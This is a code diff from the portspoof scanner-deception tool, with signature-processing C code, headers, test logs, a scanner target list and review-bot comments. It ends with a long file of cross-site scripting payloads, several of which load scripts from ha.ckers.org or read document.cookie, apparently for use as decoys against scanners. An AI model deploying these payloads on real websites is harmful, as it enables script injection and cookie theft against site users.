|
||||
{
|
||||
tmp[tmpi]=str[i];
|
||||
tmpi++;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
char* fin;
|
||||
int finlen=tmpi+1;
|
||||
|
||||
if (!(fin = (char*)malloc(finlen * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(fin,0,finlen);
|
||||
memcpy(fin,tmp,finlen-1);
|
||||
*param_len=finlen-1;
|
||||
|
||||
return fin;
|
||||
}
|
||||
|
||||
char* revregex(char * param_str,int* param_len,int start_offset,int end_offset) // with brackets
|
||||
{
|
||||
int lnaw='(';
|
||||
int rnaw=')';
|
||||
int lbrak='[';
|
||||
int rbrak=']';
|
||||
int bslash='\\';
|
||||
|
||||
|
||||
char* str; //main string
|
||||
int str_len=*param_len;
|
||||
int str_end_offset=end_offset;
|
||||
|
||||
char* tmp; // tmp string for merging
|
||||
int tmplen;
|
||||
|
||||
if (!(str = (char*)malloc((str_len+1) * sizeof(char))))
|
||||
exit(1);
|
||||
memset(str,0,str_len+1);
|
||||
memcpy(str,param_str+start_offset,str_len);
|
||||
|
||||
// start
|
||||
int i;
|
||||
int j;
|
||||
int retlen;
|
||||
char* retstr;
|
||||
repeat1:
|
||||
for(i=start_offset;i<=str_end_offset;i++) // remove () from string
|
||||
{
|
||||
if(str[i]==lnaw && i!=start_offset && str[i-1]!=bslash)
|
||||
{
|
||||
j=i;
|
||||
for(j;j<str_end_offset;j++)
|
||||
{
|
||||
if(str[j]==rnaw && str[j-1]!=bslash ){
|
||||
|
||||
//fprintf(stdout,"#(%d %d)\n",i,j);
|
||||
//revregex(str,j-i,i+1,j);
|
||||
|
||||
tmplen=str_len - 2 ;
|
||||
|
||||
if (!(tmp = (char*)malloc( ( tmplen + 1) * sizeof(char)))) // alloc without the brackets
|
||||
exit(1);
|
||||
memset(tmp,0,( tmplen + 1));
|
||||
|
||||
//get rid of ()
|
||||
memcpy(tmp,str,i); // copy up to index i
|
||||
memcpy(tmp+i,str+i+1,j-i); // copy i-j
|
||||
memcpy(tmp+j-1,str+j+1,str_len-j-1);
|
||||
|
||||
//fprintf(stdout,"# offset change: %d\n", retlen-(j-i));
|
||||
free(str);
|
||||
str=tmp;
|
||||
str_len=str_len-2;
|
||||
str_end_offset=str_end_offset-2;
|
||||
goto repeat1;
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
//fprintf(stdout,"#%s\n",str);
|
||||
|
||||
|
||||
|
||||
repeat2:
|
||||
i=start_offset;
|
||||
for(i=start_offset;i<=str_end_offset;i++)
|
||||
{
|
||||
if(str[i]==lbrak && i!=start_offset && str[i-1]!=bslash) // find left bracket
|
||||
{
|
||||
j=i;
|
||||
for(j;j<str_end_offset;j++) //find right bracket (without control char)
|
||||
{
|
||||
if(str[j]==rbrak && str[j-1]!=bslash ){
|
||||
|
||||
|
||||
//fprintf(stdout,"# [%d %c %d %c ]\n",i,str[i],j,str[j]);
|
||||
retstr=revregex_bracket(str,i,j,&retlen);
|
||||
|
||||
// merge it
|
||||
|
||||
tmplen=str_len - (j-i) + retlen;
|
||||
|
||||
if (!(tmp = (char*)malloc(tmplen)))
|
||||
exit(1);
|
||||
memset(tmp,0,tmplen);
|
||||
memcpy(tmp,str,i); // copy up to index i
|
||||
memcpy(tmp+i,retstr,retlen); // copy new string
|
||||
memcpy(tmp+i+retlen,str+j+2,str_len-j-1); // copy after index j without control
|
||||
free(str);
|
||||
str=tmp;
|
||||
str_len=tmplen;
|
||||
str_end_offset=str_end_offset+retlen - (j-i);
|
||||
goto repeat2;
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
*param_len=str_len;
|
||||
return str;
|
||||
}
|
||||
|
||||
int char2hex(char* ptr)
|
||||
{
|
||||
unsigned int value = 0;
|
||||
char ch = *ptr;
|
||||
int i=2;
|
||||
|
||||
while(i--) {
|
||||
if (ch >= '0' && ch <= '9')
|
||||
value = (value << 4) + (ch - '0');
|
||||
else if (ch >= 'A' && ch <= 'F')
|
||||
value = (value << 4) + (ch - 'A' + 10);
|
||||
else if (ch >= 'a' && ch <= 'f')
|
||||
value = (value << 4) + (ch - 'a' + 10);
|
||||
else
|
||||
return value;
|
||||
ch = *(++ptr);
|
||||
}
|
||||
|
||||
return value;
|
||||
|
||||
}
|
||||
|
||||
int ishex(char* ch)
|
||||
{
|
||||
|
||||
if (*ch >= '0' && *ch <= '9')
|
||||
return 1;
|
||||
else if (*ch >= 'A' && *ch <= 'F')
|
||||
return 1;
|
||||
else if (*ch >= 'a' && *ch <= 'f')
|
||||
return 1;
|
||||
else
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
char * escape_hex(char* str,int* final_len)
|
||||
{
|
||||
int bslash='\\';
|
||||
int i=0,i2=0;
|
||||
|
||||
int length=strlen(str);
|
||||
char *str2 = (char*)malloc(length+1);
|
||||
memset(str2,0,length+1);
|
||||
|
||||
while(*(str+i)!='\0'){
|
||||
if(*(str+i)==bslash){
|
||||
|
||||
if(*(str+i+1)!='\0' && *(str+i+1)=='0'){
|
||||
*(str2+i2)=0;
|
||||
i2++;
|
||||
i++;
|
||||
}
|
||||
else if(*(str+i+1)!='\0' && *(str+i+1)=='x' && *(str+i+2)!='\0' && ishex(str+i+2) && *(str+i+3)!='\0' && ishex(str+i+3))
|
||||
{
|
||||
//fprintf(stdout,"\\%hhx",char2hex(str+i+2));
|
||||
*(str2+i2)=(char)char2hex(str+i+2);
|
||||
i2++;
|
||||
i+=3;
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
//fprintf(stdout,"%c",*(str+i));
|
||||
}
|
||||
}
|
||||
else{
|
||||
*(str2+i2)=*(str+i);
|
||||
i2++;
|
||||
|
||||
}
|
||||
|
||||
|
||||
i++;
|
||||
}
|
||||
|
||||
*final_len=i2;
|
||||
char* strfin;
|
||||
if (!(strfin = (char*)malloc((i2 + 1) * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(strfin,0,i2+1);
|
||||
memcpy(strfin,str2,i2);
|
||||
free(str2);
|
||||
return strfin;
|
||||
|
||||
}
|
||||
|
||||
/*
|
||||
|
||||
char * clear_spaces(char* str)
|
||||
{
|
||||
|
||||
int len=0;
|
||||
int flag=1;
|
||||
int i=0;
|
||||
int j=0;
|
||||
char* str2;
|
||||
|
||||
len=strlen(str);
|
||||
if (!(str2 = malloc((len+1) * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(str2,0,len+1);
|
||||
|
||||
for(i;i<len;i++)
|
||||
{
|
||||
|
||||
if(str[i]==' ' && flag==1)
|
||||
{
|
||||
str2[j]=str[i];
|
||||
j++;
|
||||
flag=0;
|
||||
}
|
||||
else if(str[i]==' ')
|
||||
flag=0;
|
||||
else
|
||||
flag=1;
|
||||
|
||||
if(flag)
|
||||
{
|
||||
str2[j]=str[i];
|
||||
j++;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
fprintf(stdout,"size %d\n",j);
|
||||
|
||||
char* strfin;
|
||||
if (!(strfin = malloc((j + 1) * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(strfin,0,j+1);
|
||||
memcpy(strfin,str2,j);
|
||||
|
||||
free(str2);
|
||||
|
||||
return strfin;
|
||||
|
||||
}
|
||||
*/
|
||||
|
||||
std::vector<char> process_signature(std::string str)
|
||||
{
|
||||
//cout<<str;
|
||||
//cout.flush();
|
||||
|
||||
size_t length = str.length();
|
||||
char *str2 =(char*) malloc(length+1);
|
||||
memset(str2,0,length+1);
|
||||
memcpy(str2,str.c_str(),length+1);
|
||||
int final_len=length;
|
||||
char *str3=revregex(str2,&final_len,0,length-1);
|
||||
char* str4=fill_specialchars(str3,&final_len,0,final_len);
|
||||
char* str5=escape_hex(str4,&final_len);
|
||||
free(str2);
|
||||
free(str3);
|
||||
free(str4);
|
||||
|
||||
/*
|
||||
fprintf(stdout,"\n##hex##\n");
|
||||
int t=0;
|
||||
for(;t<final_len;t++)
|
||||
{
|
||||
if(*(str5+t)==0)
|
||||
fprintf(stdout,"\\00");
|
||||
else if(*(str5+t)=='\n')
|
||||
fprintf(stdout,"\\n");
|
||||
else if(*(str5+t)=='\r')
|
||||
fprintf(stdout,"\\r");
|
||||
else
|
||||
fprintf(stdout,"\\%x",*(str5+t));
|
||||
}
|
||||
fprintf(stdout,"\n");
|
||||
*/
|
||||
|
||||
std::vector<char> result_vector;
|
||||
|
||||
for(int i=0; i<final_len;i++)
|
||||
result_vector.push_back(str5[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
}
|
||||
|
||||
|
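--- a/src/src/revregex.h
+++ b/src/src/revregex.h
@@ -0,0 +1,62 @@
+/*
+* portspoof Service signature obfucastor
+* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+*
+* This program is free software; you can redistribute it and/or modify it
+* under the terms of the GNU General Public License as published by the
+* Free Software Foundation; either version 2 of the License, or (at your
+* option) any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+* See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along
+* with this program; if not, see <http://www.gnu.org/licenses>.
+*
+* Linking portspoof statically or dynamically with other modules is making
+* a combined work based on portspoof. Thus, the terms and conditions of
+* the GNU General Public License cover the whole combination.
+*
+* In addition, as a special exception, the copyright holder of portspoof
+* gives you permission to combine portspoof with free software programs or
+* libraries that are released under the GNU LGPL. You may copy
+* and distribute such a system following the terms of the GNU GPL for
+* portspoof and the licenses of the other code concerned.
+*
+* Note that people who make modified versions of portspoof are not obligated
+* to grant this special exception for their modified versions; it is their
+* choice whether to do so. The GNU General Public License gives permission
+* to release a modified version without this exception; this exception
+* also makes it possible to release a modified version which carries
+* forward this exception.
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdio.h>
+#include <string.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#include <ctype.h>
+#include <vector>
+#include <string>
+#include <iostream>
+
+using namespace std;
+
+#define BUFSIZE 1024
+#define SIGNATURES_SIZE 65535 // max port range
+
+std::vector<char> process_signature(std::string str);
+
+char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen);
+char * fill_specialchars(char * str, int* param_len, int start_offset,int end_offset);
+char* revregex(char * param_str,int* param_len,int start_offset,int end_offset);
+int char2hex(char* ptr);
+int ishex(char* ch);
+char * escape_hex(char* str,int* final_len);
+
+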
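Review bot: The prototypes in src/src/revregex.h state no ownership or bounds contract: `revregex_bracket`, `fill_specialchars`, `revregex` and `escape_hex` each return a `char *` and take `int` offsets without the length of the buffer they index. The definitions shown elsewhere on this page return `malloc`'d buffers, so a comment above each prototype such as `/* returns a malloc'd buffer of *param_len bytes; caller frees; offsets must lie inside str */` would make the caller's obligations explicit. The header also has no include guard and places `using namespace std;` at file scope, which leaks into every file that includes it. Wrapping the contents in `#ifndef REVREGEX_H` / `#define REVREGEX_H` / `#endif` and dropping the using-directive (the one C++ prototype already spells `std::`) would fix both; the repeated `<stdio.h>` and `<string.h>` includes can be collapsed at the same time.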
65535
src/src/signatures
Normal file
65535
src/src/signatures
Normal file
File diff suppressed because it is too large
18240
src/src/signatures_fin
Normal file
18240
src/src/signatures_fin
Normal file
File diff suppressed because it is too large
65535
src/src/signatures_fin2
Normal file
65535
src/src/signatures_fin2
Normal file
File diff suppressed because it is too large
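--- a/src/src/stamp-h1
+++ b/src/src/stamp-h1
@@ -0,0 +1 @@
+timestamp for src/config.h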
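--- a/src/src/target_list
+++ b/src/src/target_list
@@ -0,0 +1,18 @@
+
+Port scanners:
+
+Nmap
+Angry IP Scanner
+Superscan
+NetScanTools
+Unicornscan
+
+Vuln. scanners:
+
+Carrier
+Nessus
+Metasploit pro
+Acunetix
+Appscan
+Netsparker
+Grendel Scan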
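--- a/src/src/test.tx
+++ b/src/src/test.tx
@@ -0,0 +1,8 @@
+-> Verbose mode on.
+new conn - thread choosen: 9 - nr. of connections already in queue: 0
+new conn - thread choosen: 8 - nr. of connections already in queue: 0
+
+---
+Thread nr.8 for port 8106
+signature sent -> \32\32\30\20\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\20\45\53\4d\54\50\20\4f\70\65\6e\53\4d\54\50\44\r\n
+---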
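--- a/src/src/test.txt
+++ b/src/src/test.txt
@@ -0,0 +1,8 @@
+-> Verbose mode on.
+new conn - thread choosen: 9 - nr. of connections already in queue: 0
+new conn - thread choosen: 8 - nr. of connections already in queue: 0
+
+---
+Thread nr.8 for port 8106
+signature sent -> \32\32\30\20\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\20\45\53\4d\54\50\20\4f\70\65\6e\53\4d\54\50\44\r\n
+---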
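--- a/src/src/testfuzz
+++ b/src/src/testfuzz
@@ -0,0 +1,11 @@
+1
+2
+3
+4
+5
+6
+7
+A
+AAA
+AAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAA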
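--- a/src/src/threads.h
+++ b/src/src/threads.h
@@ -0,0 +1,56 @@
+/*
+* portspoof Service signature obfucastor
+* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+*
+* This program is free software; you can redistribute it and/or modify it
+* under the terms of the GNU General Public License as published by the
+* Free Software Foundation; either version 2 of the License, or (at your
+* option) any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+* See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along
+* with this program; if not, see <http://www.gnu.org/licenses>.
+*
+* Linking portspoof statically or dynamically with other modules is making
+* a combined work based on portspoof. Thus, the terms and conditions of
+* the GNU General Public License cover the whole combination.
+*
+* In addition, as a special exception, the copyright holder of portspoof
+* gives you permission to combine portspoof with free software programs or
+* libraries that are released under the GNU LGPL. You may copy
+* and distribute such a system following the terms of the GNU GPL for
+* portspoof and the licenses of the other code concerned.
+*
+* Note that people who make modified versions of portspoof are not obligated
+* to grant this special exception for their modified versions; it is their
+* choice whether to do so. The GNU General Public License gives permission
+* to release a modified version without this exception; this exception
+* also makes it possible to release a modified version which carries
+* forward this exception.
+*/
+
+#include <pthread.h>
+
+
+extern pthread_cond_t new_connection_cond;
+extern pthread_mutex_t new_connection_mutex;
+
+
+
+#ifndef THREAD_VARS
+#define THREAD_VARS
+
+#define MAX_THREADS 10
+#define MAX_CLIENT_PER_THREAD 30
+
+typedef struct {
+pthread_t tid;
+int client_count;
+int clients[MAX_CLIENT_PER_THREAD];
+} Thread;
+
+#endif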
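Review bot: The `Thread` struct in src/src/threads.h pairs a fixed `clients[MAX_CLIENT_PER_THREAD]` array with a separate `client_count`, but nothing in the header states the invariant that keeps writes inside the array. The code that fills `clients` is not part of this section, so this is a documentation request rather than a confirmed defect. A comment on the struct such as `/* invariant: 0 <= client_count <= MAX_CLIENT_PER_THREAD; check before storing a new socket */` would give the connection-dispatch code a stated limit to enforce. The `#ifndef THREAD_VARS` guard also opens only after `#include <pthread.h>` and the two `extern` declarations; moving it to the top of the file would put the whole header under one guard.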
1826
src/src/tmp
Normal file
1826
src/src/tmp
Normal file
File diff suppressed because it is too large
303
src/src/xss-rsnake.txt
Normal file
303
src/src/xss-rsnake.txt
Normal file
@ -0,0 +1,303 @@
|
||||
%20A
|
||||
%20AAAAAAAAAAAAAAAAAA
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG%20SRC="javascript:alert('XSS');">
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert("XSS")>
|
||||
<IMG%20SRC=`javascript:alert("RSnake%20says,%20'XSS'")`>
|
||||
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG%206;avascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC="jav ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav	ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="%20%20%20javascript:alert('XSS');">
|
||||
<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG%20SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT%20TYPE="IMAGE"%20SRC="javascript:alert('XSS');">
|
||||
<BODY%20BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY%20ONLOAD=alert('XSS')>
|
||||
<IMG%20DYNSRC="javascript:alert('XSS')">
|
||||
<IMG%20LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND%20SRC="javascript:alert('XSS');">
|
||||
<BR%20SIZE="&{alert('XSS')}">
|
||||
<LAYER%20SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK%20REL="stylesheet"%20HREF="javascript:alert('XSS');">
|
||||
<LINK%20REL="stylesheet"%20HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<http://ha.ckers.org/xss.css>;%20REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG%20SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG%20SRC="mocha:[code]">
|
||||
<IMG%20SRC="livescript:[code]">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<javascript:alert('XSS')>;%20REL=stylesheet">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;%20URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME%20SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE%20BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="width:%20expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG%20STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS%20STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS%20STYLE='no\xss:noxss("*//*");
|
||||
<STYLE%20TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A%20CLASS=XSS></A>
|
||||
<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE%20HREF="javascript:alert('XSS');//">
|
||||
<OBJECT%20TYPE="text/x-scriptlet"%20DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param%20name=url%20value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML%20ID=I><X><C><![CDATA[<IMG%20SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML%20SRC="http://ha.ckers.org/xsstest.xml"%20ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT%20SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec%20cmd="/bin/echo%20'<SCRIPT%20SRC'"--><!--#exec%20cmd="/bin/echo%20'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<?%20echo('<SCR)';
|
||||
<META%20HTTP-EQUIV="Set-Cookie"%20Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META%20HTTP-EQUIV="CONTENT-TYPE"%20CONTENT="text/html;%20charset=UTF-7">%20</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT%20a=">"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=">"%20''%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20"a='>'"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=`>`%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
'%20onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img%20src%3dx%20onerror%3dalert(1)>
|
||||
<script>%20document.getElementById(%22safe123%22).setCapture();%20document.getElementById(%22safe123%22).click();%20</script>
|
||||
<script>Object.defineProperties(window,%20{Safe:%20{value:%20{get:%20function()%20{return%20document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var%20x%20=%20document.createElement('iframe');document.body.appendChild(x);var%20xhr%20=%20x.contentWindow.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();</script>
|
||||
<script>(function()%20{var%20event%20=%20document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22,%20true,%20true,%20window,%200,%200,%200,%200,%200,%20false,%20false,%20false,%20false,%200,%20null);var%20fakeData%20=%20[event,%20{isTrusted:%20true},%20event];arguments.__defineGetter__('0',%20function()%20{%20return%20fakeData.pop();%20});alert(Safe.get.apply(null,%20arguments));})();</script>
|
||||
<script>var%20script%20=%20document.getElementsByTagName('script')[0];%20var%20clone%20=%20script.childNodes[0].cloneNode(true);%20var%20ta%20=%20document.createElement('textarea');%20ta.appendChild(clone);%20alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>xhr=new%20ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74>%20%64%20=%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22);%20%64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65));%20%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65%20=%20'(%2e%2a%3f)'%22)[%31]);%20</%73%63%72%69%70%74>
|
||||
<script>%20var%20xdr%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);%20%20xdr.open(%22get%22,%20%22/xssme2%3Fa=1%22,%20true);%20xdr.onreadystatechange%20=%20function()%20{%20try{%20%20%20var%20c;%20%20%20if%20(c=xdr.responseText.match(/document.cookie%20=%20'(.*%3F)'/)%20)%20%20%20%20alert(c[1]);%20}catch(e){}%20};%20%20xdr.send();%20</script>
|
||||
<iframe%20id=%22ifra%22%20src=%22/%22></iframe>%20<script>ifr%20=%20document.getElementById('ifra');%20ifr.contentDocument.write(%22<scr%22%20%2b%20%22ipt>top.foo%20=%20Object.defineProperty</scr%22%20%2b%20%22ipt>%22);%20foo(window,%20'Safe',%20{value:{}});%20foo(Safe,%20'get',%20{value:function()%20{%20%20%20%20return%20document.cookie%20}});%20alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var%20request%20=%20new%20XMLHttpRequest();request.open('GET',%20'http://html5sec.org/xssme2',%20false);request.send(null);if%20(request.status%20==%20200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window,%20'Safe',%20{value:{}});Object.defineProperty(Safe,%20'get',%20{value:function()%20{return%20document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return%20top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>
|
||||
<script>%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});%20</script>
|
||||
<script>%20var+MouseEvent=function+MouseEvent(){};%20MouseEvent=MouseEvent%20var+test=new+MouseEvent();%20test.isTrusted=true;%20test.type='click';%20%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click(test);%20</script>
|
||||
<script>%20%20(function%20(o)%20{%20%20%20function%20exploit(x)%20{%20%20%20%20if%20(x%20!==%20null)%20%20%20%20%20alert('User%20cookie%20is%20'%20%2B%20x);%20%20%20%20else%20%20%20%20%20console.log('fail');%20%20%20}%20%20%20%20%20%20o.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__('isTrusted',%20function%20()%20{%20return%20true;%20});%20%20%20%20exploit(Safe.get());%20%20%20};%20%20%20%20%20%20var%20e%20=%20document.createEvent('MouseEvent');%20%20%20e.initEvent('click',%20true,%20true);%20%20%20o.dispatchEvent(e);%20%20})(document.getElementById('safe123'));%20</script>
|
||||
<iframe%20src=/%20onload=eval(unescape(this.name.replace(/\/g,null)))%20name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script>%20%20%20%20%20function%20b()%20{%20return%20Safe.get();%20}%20alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));%20</script>%20
|
||||
<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=alert(this.ownerDocument.cookie)%20width=0%20height=%200%20/>%20#
|
||||
<script>%20%20function%20foo(elem,%20doc,%20text)%20{%20%20%20elem.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__(text[0],%20function%20()%20{%20return%20true%20})%20%20%20%20alert(Safe.get());%20%20%20};%20%20%20%20%20%20var%20event%20=%20doc.createEvent(text[1]);%20%20%20event.initEvent(text[2],%20true,%20true);%20%20%20elem.dispatchEvent(event);%20%20}%20</script>%20<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=foo(this,this.ownerDocument,this.name.split(/,/))%20name=isTrusted,MouseEvent,click%20width=0%20height=0%20/>%20#%20
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
